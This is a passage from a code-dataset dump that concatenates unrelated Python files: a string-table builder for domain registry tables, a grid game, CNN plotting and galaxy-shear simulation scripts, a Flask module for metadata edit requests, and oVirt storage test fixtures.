self._time_val:\n return self._mixing_coeff_vals\n\n bldepth_min = 50.0\n bldepth_max = 150.0\n bldepth_del = bldepth_max - bldepth_min\n bldepth = bldepth_min \\\n + bldepth_del * (0.5 + 0.5 * np.cos((2 * np.pi) * ((time / 365.0) - 0.25)))\n # z_lin ranges from 0.0 to 1.0 over span of 50.0 m, is 0.5 at bldepth\n z_lin = 0.5 + (self.axis.edges - bldepth) * (1.0 / 50.0)\n z_lin = np.maximum(0.0, np.minimum(1.0, z_lin))\n res_log10_shallow = 0.0\n res_log10_deep = -5.0\n res_log10_del = res_log10_deep - res_log10_shallow\n res_log10 = res_log10_shallow + res_log10_del * z_lin\n self._time_val = time\n self._mixing_coeff_vals = 86400.0 * 10.0 ** res_log10\n return self._mixing_coeff_vals\n\n################################################################################\n\nif __name__ == '__main__':\n main(_parse_args())\n","sub_path":"newton_fcn_test_problem.py","file_name":"newton_fcn_test_problem.py","file_ext":"py","file_size_in_byte":24445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"612049894","text":"#!/usr/bin/python2.4\n#\n# Copyright 2011 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Builds the string table. See class comment for more details.\"\"\"\n\n__author__ = 'bmcquade@google.com (Bryan McQuade)'\n\nclass StringTableBuilder(object):\n \"\"\"Builds a string table of hostname parts from the given suffix trie.\n\n StringTableBuilder constructs the string table and provides an API\n to find the index of a hostname-part within the string table.\n\n The string table is an array of null-separated unique string\n suffixes, combined with a map that allows for efficient lookup of\n the offset of a string suffix within the array.\n \"\"\"\n def __init__(self):\n # The generated string table containing one character per element,\n # e.g. for \"com\\0edu\\0au\\0 the table would contain: ['c', 'o',\n # 'm', '\\0', 'e', 'd', 'u', '\\0', 'a', 'u', '\\0'].\n self._string_table = []\n\n # Map from a hostname-part (e.g. 'com' or 'edu') to its offset in\n # the string table.\n self._hostname_part_map = {}\n\n def BuildStringTable(self, hostname_part_node, root_suffix_node):\n \"\"\"Constructs the string table using the specified tries.\n\n Args:\n hostname_part_node: TrieNode for the hostname part being added to\n the string table.\n root_suffix_node: Root TrieNode containing all unique hostname part\n string suffixes.\n \"\"\"\n children = hostname_part_node.GetChildren()\n\n # Iterate over all of the children in the hostname part node, and\n # add each to the string table.\n for child in children:\n node = root_suffix_node\n # NOTE: iterating characters in reverse order assumes that there\n # are no multibyte characters in the stream.\n for char in reversed(child.GetName()):\n if ord(char) > 127:\n raise ValueError(\"Encountered unexpected multibyte character.\")\n\n # Get the node associated with the character. 
Since\n # root_suffix_node was already populated with all of the\n # hostname-parts, this should always succeed. If there is no\n # child node for the given character, it's an error, and\n # GetChild will raise a ValueError.\n node = node.GetChild(char)\n self._EmitHostnamePart(node)\n\n # Now recursively add all of the children of the\n # hostname_part_node to the string table.\n for child in children:\n self.BuildStringTable(child, root_suffix_node)\n\n def GetStringTable(self):\n \"\"\"Return the generated string table.\"\"\"\n return self._string_table\n\n def GetHostnamePartOffset(self, name):\n \"\"\"Get the offset of the given hostname-part in the string table.\"\"\"\n return self._hostname_part_map[name]\n\n def _EmitHostnamePart(self, node):\n \"\"\"Emit the hostname-part for the node to the string table.\n\n Args:\n node: The string suffix node to emit. Each node in the chain\n contains a single character to be emitted.\n \"\"\"\n\n # Find the most shallow leaf under this node and emit it\n # instead. By emitting only leaves, we compress hostname-parts\n # that are themselves suffixes of other hostname-parts. For\n # instance, we do not emit 'missoula' because it is a suffix of\n # another hostname-part 'fortmissoula'. We can instead emit\n # 'fortmissoula' and refer to 'missoula' as the offset of\n # 'fortmissoula' plus 4 characters. This reduces the size of the\n # string table by ~1kB.\n node = StringTableBuilder._FindMostShallowLeafNode(node)\n\n hostname_part = node.GetIdentifier()\n if hostname_part in self._hostname_part_map:\n # This hostname part has already been emitted during a previous\n # invocation, so there is nothing more to do.\n return\n\n # Store the offset of the hostname part we're about to emit.\n self._hostname_part_map[hostname_part] = len(self._string_table)\n\n # Append the characters for this hostname_part to the string table\n # as well as a trailing null byte.\n self._string_table.extend(hostname_part)\n self._string_table.append('\\0')\n\n # Next, walk up the parent chain, looking for additional terminal\n # nodes. For each terminal node, create an entry in the\n # hostname_parts map. Since each parent that is a terminal node is\n # a suffix of the hostname_part we just added (e.g. if we just\n # added 'hello' then our parent is 'ello', the next parent is\n # 'llo', etc), the index in the hostname_part map should point\n # into the string we just added to the string table. 
For instance\n # if we just added 'hello' at index 500 and 'llo' is a terminal\n # node, we should add an entry for 'llo' at index 502.\n\n # Remember the index of the hostname_part just added, as well as\n # its length, so we can add parent terminal nodes relative to it.\n leaf_hostname_part_index = self._hostname_part_map[hostname_part]\n leaf_hostname_part_len = len(hostname_part)\n\n parent = node.GetParent()\n while True:\n if parent.IsTerminalNode():\n hostname_part = parent.GetIdentifier()\n if hostname_part not in self._hostname_part_map:\n offset = leaf_hostname_part_len - len(hostname_part)\n self._hostname_part_map[hostname_part] = (\n leaf_hostname_part_index + offset)\n if parent.IsRoot():\n break\n parent = parent.GetParent()\n\n @staticmethod\n def _FindMostShallowLeafNode(node):\n \"\"\"Return the most shallow leaf TrieNode under the the given node.\n\n Returns the given node if that node is a leaf node.\n\n Args:\n node: The TrieNode to begin searching from.\n \"\"\"\n # Suppress warning \"Object (best) has no attribute (GetParentChain)\"\n __pychecker__ = 'no-objattrs'\n\n if not node.HasChildren():\n return node\n\n candidates = (StringTableBuilder._FindMostShallowLeafNode(child)\n for child in node.GetChildren())\n\n # Return the candidate node with the smallest chain length.\n # oschaaf(XXX):\n # We sort on x.GetIdentifier() too to avoid inconsistent results between\n # 32 bits and 64 bits systems running this script in case multiple\n # candidates have the same (minimum) chain length.\n # Though not sorting on x.GetIdentifier() doesn't seem to affect validity\n # the consistency is helpful in that it will avoid future debugging \n # sessions.\n s = sorted(candidates,\n key = lambda x: (len(x.GetParentChain()), x.GetIdentifier()))\n return s[0]\n","sub_path":"third_party/domain_registry_provider/src/registry_tables_generator/string_table_builder.py","file_name":"string_table_builder.py","file_ext":"py","file_size_in_byte":6944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"585591052","text":"from Tile_Player import Player\nfrom Tile_Player import Tile\nfrom Tile_Player import Target\nfrom usingEnums import Direction\nfrom usingEnums import Element\nimport sys\n\nclass Field(object):\n\n def __init__(self, heigth, width):\n self.heigth = heigth\n self.width = width\n self.counter = 0\n self.list = [[0 for x in range(self.width + 1)] for y in range(self.heigth+ 1)]\n for y in range(0, self.heigth +1):\n for x in range(0, self.width+1):\n if(x is 0 or x is self.width or y is 0 or y is self.heigth):\n self.list[x][y] = (Tile(Element.Wall))\n else:\n self.list[x][y] = (Tile(Element.Free))\n\n def addPlayer(self, x, y):\n if(self.list[x][y].element is Element.Free):\n self.list[x][y] = self.player = Player(x, y)\n\n def addTarget(self, x, y):\n if(self.list[x][y].element is Element.Free):\n self.list[x][y] = self.target = Target(x, y)\n\n\n def Draw(self):\n for y in range(0, self.heigth +1):\n for x in range(0, self.width+1):\n if(x is 0 or x is self.width or y is 0 or y is self.heigth):\n if(x is self.width):\n print(self.list[x][y].element.value, end=\"\\n\")\n else:\n print(self.list[x][y].element.value, end=\"\")\n else:\n print(self.list[x][y].element.value, end=\"\")\n\n def MovePlayer(self, direction, objectToMove):\n output = \"\"\n if(objectToMove.__class__ is Player):\n x = self.player.x\n y = self.player.y\n if(Direction.left.value in direction):\n x = x - 1\n if(Direction.up.value in direction):\n y = y 
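The suffix-compression trick in StringTableBuilder above ('missoula' addressed inside 'fortmissoula') can be sanity-checked with plain lists: the offset of a suffix is the emitted leaf's offset plus the length difference. A minimal sketch with illustrative helper names:

table = []
offsets = {}

def emit(part):
    # Mirrors _EmitHostnamePart: record the offset, then append chars + NUL.
    offsets[part] = len(table)
    table.extend(part)
    table.append("\0")

emit("fortmissoula")
# 'missoula' needs no new characters; it already lives inside 'fortmissoula'.
offsets["missoula"] = offsets["fortmissoula"] + len("fortmissoula") - len("missoula")
start = offsets["missoula"]
assert "".join(table[start:start + len("missoula")]) == "missoula"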
-1\n if(Direction.right.value in direction):\n x = x + 1\n if(Direction.down.value in direction):\n y = y + 1\n\n if(objectToMove.__class__ is Player):\n if(self.list[x][y].element is Element.Free or self.list[x][y].element is Element.Target):\n self.list[self.player.x][self.player.y] = Tile(Element.Free)\n self.list[x][y] = Player(x, y)\n prevxplayer = self.player.x\n prevyplayer = self.player.y\n self.player.x = x\n self.player.y = y\n\n\n if(self.target.x is self.player.x and self.target.y is self.player.y):\n self.list[prevxplayer][prevyplayer] = Target(prevxplayer, prevyplayer)\n self.target.x = prevxplayer\n self.target.y = prevyplayer\n self.counter += 1\n if(self.counter > 6):\n output = (\"Really??\")\n else:\n if(self.counter > 4):\n output = (\"Are you Even Trying?\")\n else:\n if(self.counter > 2):\n output = (\"Is it Really that hard?\")\n\n return (output)\n","sub_path":"Field.py","file_name":"Field.py","file_ext":"py","file_size_in_byte":3064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"618274467","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 26 21:23:46 2019\n\n@author: hwan\n\"\"\"\n\nfrom Utilities.plot_and_save_figures_layerwise import plot_and_save_figures\nfrom decimal import Decimal # for filenames\nimport os\nimport sys\n\nimport pdb #Equivalent of keyboard in MATLAB, just add \"pdb.set_trace()\"\n\n###############################################################################\n# HyperParameters and RunOptions #\n###############################################################################\nclass Hyperparameters:\n max_hidden_layers = 3 # For this architecture, need at least 2. One for the mapping to the feature space, one as a trainable hidden layer. 
EXCLUDES MAPPING BACK TO DATA SPACE\n filter_size = 3\n num_filters = 12\n activation = 'elu'\n regularization = 0.001\n node_TOL = 1e-4\n error_TOL = 1e-4\n batch_size = 1000\n num_epochs = 3\n\nclass RunOptions:\n def __init__(self): \n #=== Use L_1 Regularization ===#\n self.use_L1 = 1\n self.use_L2 = 0\n \n #=== Choose Data Set ===#\n self.data_MNIST = 1\n self.data_CIFAR10 = 0 \n self.data_CIFAR100 = 0\n \n #=== Random Seed ===#\n self.random_seed = 1234\n \n###############################################################################\n# File Paths #\n###############################################################################\nclass FilePaths(): \n def __init__(self, hyperp, run_options): \n #=== Declaring File Name Components ===# \n self.NN_type = 'CNN'\n if run_options.data_MNIST == 1:\n self.dataset = 'MNIST'\n if run_options.data_CIFAR10 == 1:\n self.dataset = 'CIFAR10'\n if run_options.data_CIFAR100 == 1:\n self.dataset = 'CIFAR100' \n if run_options.use_L1 == 1:\n reg_string = '_L1'\n if run_options.use_L2 == 1:\n reg_string = '_L2' \n if hyperp.regularization >= 1:\n regularization_string = str(hyperp.regularization)\n else:\n regularization_string = str(hyperp.regularization)\n regularization_string = 'pt' + regularization_string[2:] \n node_TOL_string = str('%.2e' %Decimal(hyperp.node_TOL))\n node_TOL_string = node_TOL_string[-1]\n error_TOL_string = str('%.2e' %Decimal(hyperp.error_TOL))\n error_TOL_string = error_TOL_string[-1]\n \n #=== File Name ===#\n if run_options.use_L1 == 0 and run_options.use_L2 == 0:\n self.filename = self.dataset + '_' + self.NN_type + '_mhl%d_fs%d_nf%d_eTOL%s_b%d_e%d' %(hyperp.max_hidden_layers, hyperp.filter_size, hyperp.num_filters, error_TOL_string, hyperp.batch_size, hyperp.num_epochs)\n else:\n self.filename = self.dataset + '_' + self.NN_type + reg_string + '_mhl%d_fs%d_nf%d_r%s_nTOL%s_eTOL%s_b%d_e%d' %(hyperp.max_hidden_layers, hyperp.filter_size, hyperp.num_filters, regularization_string, node_TOL_string, error_TOL_string, hyperp.batch_size, hyperp.num_epochs)\n\n #=== Saving neural network ===#\n self.NN_savefile_directory = '../Trained_NNs/' + self.filename # Since we save the parameters for each layer separately, we need to create a new folder for each model\n self.NN_savefile_name = self.NN_savefile_directory + '/' + self.filename # The file path and name for the saved parameters\n\n #=== Saving Figures ===#\n self.figures_savefile_directory = '../Figures/' + self.filename\n\n #=== Creating Directories ===#\n if not os.path.exists(self.figures_savefile_directory):\n os.makedirs(self.figures_savefile_directory)\n \n###############################################################################\n# Driver #\n###############################################################################\nif __name__ == \"__main__\": \n\n #=== Hyperparameters and Run Options ===# \n hyperp = Hyperparameters()\n run_options = RunOptions()\n \n if len(sys.argv) > 1:\n hyperp.max_hidden_layers = int(sys.argv[1])\n hyperp.filter_size = int(sys.argv[2])\n hyperp.num_filters = int(sys.argv[3])\n hyperp.activation = str(sys.argv[4])\n hyperp.regularization = float(sys.argv[5])\n hyperp.reg_schedule = float(sys.argv[6])\n hyperp.node_TOL = float(sys.argv[7])\n hyperp.error_TOL = float(sys.argv[8])\n hyperp.batch_size = int(sys.argv[9])\n hyperp.num_epochs = int(sys.argv[10])\n \n #=== File Names ===#\n file_paths = FilePaths(hyperp, run_options)\n \n #=== Plot and save figures ===#\n plot_and_save_figures(hyperp, run_options, 
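FilePaths above flattens hyperparameters into a filename, rewriting sub-unit regularization values with a 'pt' prefix and keeping only the last exponent digit of each tolerance. The same two transforms in isolation:

from decimal import Decimal

regularization, node_TOL = 0.001, 1e-4
reg_str = str(regularization)
if regularization < 1:
    reg_str = 'pt' + reg_str[2:]  # '0.001' -> 'pt001'
tol_str = str('%.2e' % Decimal(node_TOL))[-1]  # '1.00e-04' -> '4'
assert (reg_str, tol_str) == ('pt001', '4')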
file_paths)\n","sub_path":"Codes_TF2/Plotting_Results_CNNLayerwise.py","file_name":"Plotting_Results_CNNLayerwise.py","file_ext":"py","file_size_in_byte":5006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"243152031","text":"from flask import Flask, request \nfrom flask import redirect, url_for\nfrom utils import mysqldb \nfrom flask import session\n\ndef rander_one_apply(apy):\n\trow= {'opt':[]}\n\n\tapply_type = apy.apply_type\n\tif apply_type == 'host_create' or apply_type == 'host_change':\n\t\thost_id = apy.entity_id\n\t\tdata_host = mysqldb.DataHost.query.filter_by(id=host_id).first()\n\t\trow['HOST']=data_host.name\n\t\trow['DATABASE']='N/A'\n\t\trow['TABLE']='N/A'\n\tif apply_type == 'db_create' or apply_type == 'db_change':\n\t\tdb_id = apy.entity_id\n\t\tdata_base = mysqldb.DataBase.query.filter_by(id=db_id).first()\n\t\thost_id = data_base.host_id \n\t\tdata_host = mysqldb.DataHost.query.filter_by(id=host_id).first()\n\t\trow['HOST']=data_host.name\n\t\trow['DATABASE']=data_base.name\n\t\trow['TABLE']='N/A'\n\tif apply_type == 'table_create' or apply_type == 'table_change':\n\t\ttable_id = apy.entity_id\n\t\tdata_table = mysqldb.DataTable.query.filter_by(id=table_id).first()\n\t\tdb_id = data_table.db_id \n\t\tdata_base = mysqldb.DataBase.query.filter_by(id=db_id).first()\n\t\thost_id = data_base.host_id\n\t\tdata_host = mysqldb.DataHost.query.filter_by(id=host_id).first()\n\t\trow['HOST']=data_host.name\n\t\trow['DATABASE']=data_base.name\n\t\trow['TABLE']=data_table.name\n\n\trow['ID']=apy.id\n\trow['TYPE']=apy.apply_type\n\trow['TIME_EDIT']=apy.update_time\n\trow['STATUS']=apy.apply_status\n\trow['REVIEWER']=apy.reviewer\n\trow['opt'].append({ \n\t\t'url':url_for('edits', apply_id=apy.id), \n\t\t'icon':'icon-pencil' \n\t})\t\n\treturn row\n\n\ndef list_applies(request):\n\tmodel = {}\n\tapplyer_id = session['userinfo']['id']\n\tapplyer = session['userinfo']['name']\n\n\tapplies = mysqldb.DataApply.query.filter_by(applyer_id=applyer_id).order_by(mysqldb.DataApply.update_time.desc())\n\tmodel['table']=[]\n\tfor apy in applies:\n\t\trow = rander_one_apply(apy)\n\t\tmodel['table'].append(row)\n\treturn model\n\ndef service(request):\n\tmodel={}\n\tmodel=list_applies(request)\n\treturn model\n\ndef edit_detail_parse(request):\n\tapply_id = request.args.get('apply_id')\n\tapy = mysqldb.DataApply.query.filter_by(id=apply_id).first()\n\tapply_type = apy.apply_type\n\tif apply_type == 'host_create' or apply_type == 'host_change':\n\t\treturn url_for('edit_host', apply_id=apply_id)\n\tif apply_type == 'db_create' or apply_type == 'db_change':\n\t\treturn url_for('edit_db', apply_id=apply_id)\n\tif apply_type == 'table_create' or apply_type == 'table_change':\n\t\treturn url_for('edit_table', apply_id=apply_id)\n","sub_path":"meta_data/modules/mod_edits.py","file_name":"mod_edits.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"518355213","text":"from astropy.io import fits\nfrom ngmix.medsreaders import NGMixMEDS\nimport numpy as np\nimport galsim\nimport fitsio\n\n#Functions\ndef flux_to_mag(F):\n return -2.5*np.log10(F)+30.0\n\ndef mag_to_flux(m):\n return 10**(-0.4*(m-30))\n\ndef make_sim_one_cutout(*, seed, g1, g2, open_meds, obj_ind, cutout):\n m = open_meds\n rng = np.random.RandomState(seed=seed)\n gal = galsim.Exponential(half_light_radius=0.5).shear(g1=g1, g2=g2) #let's do sheared exponentials again\n\n 
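flux_to_mag and mag_to_flux in Metacal_test_V1.py above are inverses around a zero point of 30, so the flux scaling applied when drawing the galaxy can be checked numerically (the magnitude value here is arbitrary):

import numpy as np

def flux_to_mag(F):
    return -2.5 * np.log10(F) + 30.0

def mag_to_flux(m):
    return 10 ** (-0.4 * (m - 30))

# mag 18 at zero point 30 corresponds to 10**4.8 ~ 63095.7 counts
assert np.isclose(mag_to_flux(18.0), 10 ** 4.8)
assert np.isclose(flux_to_mag(mag_to_flux(18.0)), 18.0)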
#fwhm=rng.uniform(low=0.8,high=1.5) #will use a random FWHM for each sim just because\n # fwhm=np.random.uniform(low=0.8,high=1.0)\n psf = galsim.Gaussian(fwhm=0.9)\n obj = galsim.Convolve([gal, psf])\n\n dim = m[1]['box_size'][obj_ind] #size of the image box\n\n cutout_row = m[1]['cutout_row'][obj_ind][cutout]\n cutout_col = m[1]['cutout_col'][obj_ind][cutout]\n #dither = np.random.uniform(size=2, low=-0.5, high=0.5)\n #scale = 0.263 #the size of a DECam pixel in arcsec on the sky\n\n #get WCS:\n #jacobian: column in MEDS is x, row is y\n dudx = m[1]['dudcol'][obj_ind][cutout]\n dudy = m[1]['dudrow'][obj_ind][cutout]\n dvdx = m[1]['dvdcol'][obj_ind][cutout]\n dvdy = m[1]['dvdrow'][obj_ind][cutout]\n wcs = galsim.JacobianWCS(dudx, dudy, dvdx, dvdy)\n\n #from matt: drawImage(nx=stampsize, ny=stampsize, wcs=jac_wcs, center=galsim.PositionD(x=cutout_col, y=cutout_row))\n #flux = m[1].data['flux'][obj_ind]\n im = obj.drawImage(nx=dim, ny=dim, wcs=wcs,\n center=galsim.PositionD(x=cutout_col, y=cutout_row)).array * mag_to_flux(18.0) #multiplying by flux here, is that what I really want?\n\n im_start_row = m[1]['start_row'][obj_ind][cutout]\n im_end_row = im_start_row + dim**2\n weight=m[5][im_start_row:im_end_row].reshape(dim,dim) #get the weight of each cutout, will use this to add noise to the simulated image\n with np.errstate(divide='ignore', invalid = 'ignore'):\n nse=np.sqrt(1.0/weight)\n im += rng.normal(size=im.shape, scale=nse)\n # im += np.random.normal(size=im.shape, scale=nse)\n im[weight==0.0]=0.0 #setting the flux to zero where the weight is zero\n\n bmask_im = m['bmask_cutouts'][im_start_row:im_end_row]\n bmask_im[bmask_im!=2**30] = 0 #setting bmask to zero everywhere it is not 2^30\n\n\n psf_row = m[1]['psf_row_size'][obj_ind][cutout] #size of the PSF (rows) for each cutout\n psf_col = m[1]['psf_col_size'][obj_ind][cutout] #size of the PSF (cols) for each cutout\n assert psf_row==psf_col, \"PSF is not a square, which they say is not cool\"\n\n psf_start_row = m[1]['psf_start_row'][obj_ind][cutout]\n psf_end_row = psf_start_row + psf_row*psf_col\n psf_center_y = m[1]['psf_cutout_row'][obj_ind][cutout]+1\n psf_center_x = m[1]['psf_cutout_col'][obj_ind][cutout]+1\n psf_im = psf.drawImage(nx=psf_row, ny=psf_col, wcs=wcs,\n center=galsim.PositionD(x=psf_center_x, y=psf_center_y)).array\n\n return im.ravel(), psf_im.ravel(), bmask_im.ravel(), im_start_row, im_end_row, psf_start_row, psf_end_row\n\n\ndef replace_all_cutouts_by_sims(input_medsname, seed, g1, g2, verbose=False):\n m = fitsio.FITS(input_medsname,mode='rw') #opens the input file\n Nobjects = m[1].get_nrows() #gets number of objects (rows) in the file\n for i_obj in range(Nobjects): #loops over objects in the file\n Ncutout = m[1]['ncutout'][i_obj]\n if verbose and i_obj%1000==0: print(\"Object %d has %d cutouts to be replaced\"%(i_obj,Ncutout))\n for j_cut in range(Ncutout): #loops over cutout in each object in the file\n im, psf, bmask, im_start, im_end, psf_start, psf_end = make_sim_one_cutout(seed=seed, g1= g1, g2=g2,\n open_meds=m, obj_ind=i_obj, cutout=j_cut)\n\n m['image_cutouts'].write(im, im_start)\n m['bmask_cutouts'].write(bmask, im_start)\n m['psf'].write(psf, psf_start)\n m.close()\n\nif __name__ == \"__main__\":\n\n import sys\n sys.path.insert(0,'/home/dhayaa/Desktop/DECADE/delve_cs_test/code/newish_metacal/tests')\n sys.path.insert(0,'/home/dhayaa/Desktop/DECADE/delve_cs_test/code/newish_metacal')\n sys.path.insert(0,'/home/dhayaa/Desktop/DECADE/delve_cs_test/code/newish_metacal/metacal')\n\n import 
 test_metacal\n\n    seed = int(sys.argv[1])\n\n\n    input_medsname = r'/scratch/midway2/dhayaa/Metacal_test_V1/gplus_V%d.fits'%seed\n    replace_all_cutouts_by_sims(input_medsname, seed, 0.02, 0.00, verbose=True)\n\n    input_medsname = r'/scratch/midway2/dhayaa/Metacal_test_V1/gminus_V%d.fits'%seed\n    replace_all_cutouts_by_sims(input_medsname, seed, -0.02, 0.00, verbose=True)\n\n    #Generate output files\n\n    from _step import _run_metacal as run_metacal\n\n    filename = ['/scratch/midway2/dhayaa/Metacal_test_V1/gplus_V%d.fits'%seed]\n    output = run_metacal(filename, 8)\n    fitsio.write('/scratch/midway2/dhayaa/Metacal_test_V1/gplus_V%d_metacal_output.fits'%seed, output, clobber=True)\n\n    filename = ['/scratch/midway2/dhayaa/Metacal_test_V1/gminus_V%d.fits'%seed]\n    output = run_metacal(filename, 8)\n    fitsio.write('/scratch/midway2/dhayaa/Metacal_test_V1/gminus_V%d_metacal_output.fits'%seed, output, clobber=True)\n","sub_path":"code/Metacal_test_V1.py","file_name":"Metacal_test_V1.py","file_ext":"py","file_size_in_byte":5210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"131203627","text":"import config\nimport pytest\nimport logging\nfrom art.unittest_lib.common import testflow\nfrom art.rhevm_api.tests_lib.low_level import (\n    hosts as ll_hosts,\n    storagedomains as ll_sd,\n    datacenters as ll_dc,\n    clusters as ll_clusters,\n    jobs as ll_jobs,\n    vms as ll_vms,\n    templates as ll_templates,\n)\nfrom art.rhevm_api.tests_lib.high_level import (\n    storagedomains as hl_sd\n)\nfrom rhevmtests.storage import helpers as storage_helpers\nlogger = logging.getLogger(__name__)\nfrom art.unittest_lib.common import StorageTest as TestCase  # noqa\n\n\n@pytest.fixture(scope='class')\ndef init_hsm_host(request, storage):\n    \"\"\"\n    Selects the first non-SPM host\n    \"\"\"\n    self = request.node.cls\n\n    status, hsm_host = ll_hosts.get_any_non_spm_host(\n        config.HOSTS, cluster_name=config.CLUSTER_NAME\n    )\n    assert status, \"Failed to retrieve a non-SPM host on cluster '%s'\" % (\n        config.CLUSTER_NAME\n    )\n    self.host_name = hsm_host['hsmHost']\n\n\n@pytest.fixture(scope='class')\ndef init_spm_host(request, storage):\n    \"\"\"\n    Selects the SPM host\n    \"\"\"\n    self = request.node.cls\n\n    self.spm_host = ll_hosts.get_spm_host(config.HOSTS)\n    assert self.spm_host, \"Failed to retrieve SPM host on cluster '%s'\" % (\n        config.CLUSTER_NAME\n    )\n\n\n@pytest.fixture(scope='class')\ndef create_dc_with_no_hosts(request, storage):\n    \"\"\"\n    Creates a data center with no hosts\n    \"\"\"\n    self = request.node.cls\n\n    assert ll_dc.addDataCenter(\n        True, name=self.new_dc_name, local=False, version=self.dc_version\n    ), \"Failed to create data center '%s'\" % self.new_dc_name\n\n\n@pytest.fixture(scope='class')\ndef create_cluster_with_no_hosts(request, storage):\n    \"\"\"\n    Creates a cluster with no hosts\n    \"\"\"\n    self = request.node.cls\n\n    self.host_ip = ll_hosts.get_host_ip(self.host_name)\n    logger.info(\n        \"Retrieve the first host from the 2nd cluster (in original Data \"\n        \"center)\"\n    )\n    assert ll_clusters.addCluster(\n        True, name=self.cluster_name, cpu=config.CPU_NAME,\n        data_center=self.new_dc_name, version=self.cluster_version\n    ), \"Failed to create Cluster '%s'\" % self.cluster_name\n\n\n@pytest.fixture(scope='class')\ndef create_one_or_more_storage_domains_same_type_for_upgrade(request, storage):\n    \"\"\"\n    Creates one or more storage domains for upgrade tests\n    \"\"\"\n    self = request.node.cls\n\n    self.sd_names = []\n    for sd in
range(self.new_storage_domains_count):\n self.storage_domain = (\n 'upgrade_%s_to_%s_%s' % self.name_pattern + str(sd)\n )\n\n storage_helpers.add_storage_domain(\n storage_domain=self.storage_domain, data_center=self.new_dc_name,\n index=sd, storage_type=self.storage\n )\n self.sd_names.append(self.storage_domain)\n self.storage_domain = self.sd_names[0]\n\n\n@pytest.fixture(scope='class')\ndef deactivate_and_remove_non_master_domains(request, storage):\n \"\"\"\n Remove storage domains created for the test\n \"\"\"\n self = request.node.cls\n\n def finalizer():\n found, master_domain = ll_sd.findMasterStorageDomain(\n True, self.new_dc_name\n )\n assert found, (\n \"Could not find master storage domain on data center '%s'\"\n % self.new_dc_name\n )\n master_domain = master_domain['masterDomain']\n testflow.teardown(\n \"Data center's %s master domain is %s\", self.new_dc_name,\n master_domain\n )\n\n for sd_name in self.sd_names:\n if ll_sd.checkIfStorageDomainExist(True, sd_name):\n if not sd_name == master_domain:\n testflow.teardown(\n \"deactivating storage domain %s\", sd_name\n )\n assert hl_sd.deactivate_domain(\n self.new_dc_name, sd_name, config.ENGINE\n ), \"Failed to deactivate storage domain %s\" % sd_name\n testflow.teardown(\"Removing storage domain %s \", sd_name)\n assert hl_sd.remove_storage_domain(\n sd_name, self.new_dc_name, self.host_name,\n engine=config.ENGINE, format_disk=True\n ), \"Failed to remove storage domain %s\" % sd_name\n self.storage_domain = master_domain\n request.addfinalizer(finalizer)\n\n\n@pytest.fixture(scope='class')\ndef remove_unattached_domain(request, storage):\n \"\"\"\n Remove the unattached domain left after DC removal\n \"\"\"\n self = request.node.cls\n\n def finalizer():\n if ll_sd.checkIfStorageDomainExist(True, self.storage_domain):\n testflow.teardown(\"Remove storage domain %s\", self.storage_domain)\n assert ll_sd.removeStorageDomain(\n True, self.storage_domain, self.host_name, format='true',\n ), (\"Failed to remove storage domain %s\", self.storage_domain)\n\n request.addfinalizer(finalizer)\n\n\n@pytest.fixture(scope='class')\ndef initialize_dc_parameters_for_upgrade(request, storage):\n \"\"\"\n Initializing DC parameters for 4.0 to 4.1 upgrade\n \"\"\"\n\n self = request.node.cls\n\n self.name_pattern = '4_0', '4_1', self.__name__\n self.new_dc_name = storage_helpers.create_unique_object_name(\n self.__name__, config.OBJECT_TYPE_DC\n )\n self.cluster_name = storage_helpers.create_unique_object_name(\n self.__name__, config.OBJECT_TYPE_CLUSTER\n )\n self.nfs_sd_name = \"sd_upgrade_%s_to_%s_nfs_%s\" % self.name_pattern\n self.iscsi_sd_name = \"sd_upgrade_%s_to_%s_iscsi_%s\" % self.name_pattern\n self.gluster_sd_name = \"sd_upgrade_%s_to_%s_gluster_%s\" % self.name_pattern\n self.fcp_sd_name = \"sd_upgrade_%s_to_%s_fcp_%s\" % self.name_pattern\n self.cluster_version = '4.0'\n self.cluster_upgraded_version = '4.1'\n self.dc_version = '4.0'\n self.dc_upgraded_version = '4.1'\n self.storage_format = 'v3'\n self.upgraded_storage_format = 'v4'\n\n\n@pytest.fixture(scope='class')\ndef remove_another_vm(request, storage):\n \"\"\"\n Remove another VM created during the test\n \"\"\"\n self = request.node.cls\n\n def finalizer():\n testflow.teardown(\"Remove VM %s\", self.new_vm_name)\n assert ll_vms.safely_remove_vms([self.new_vm_name]), (\n \"Failed to power off and remove VM %s\" % self.new_vm_name\n )\n ll_jobs.wait_for_jobs([config.JOB_REMOVE_VM])\n\n request.addfinalizer(finalizer)\n\n\n@pytest.fixture(scope='class')\ndef 
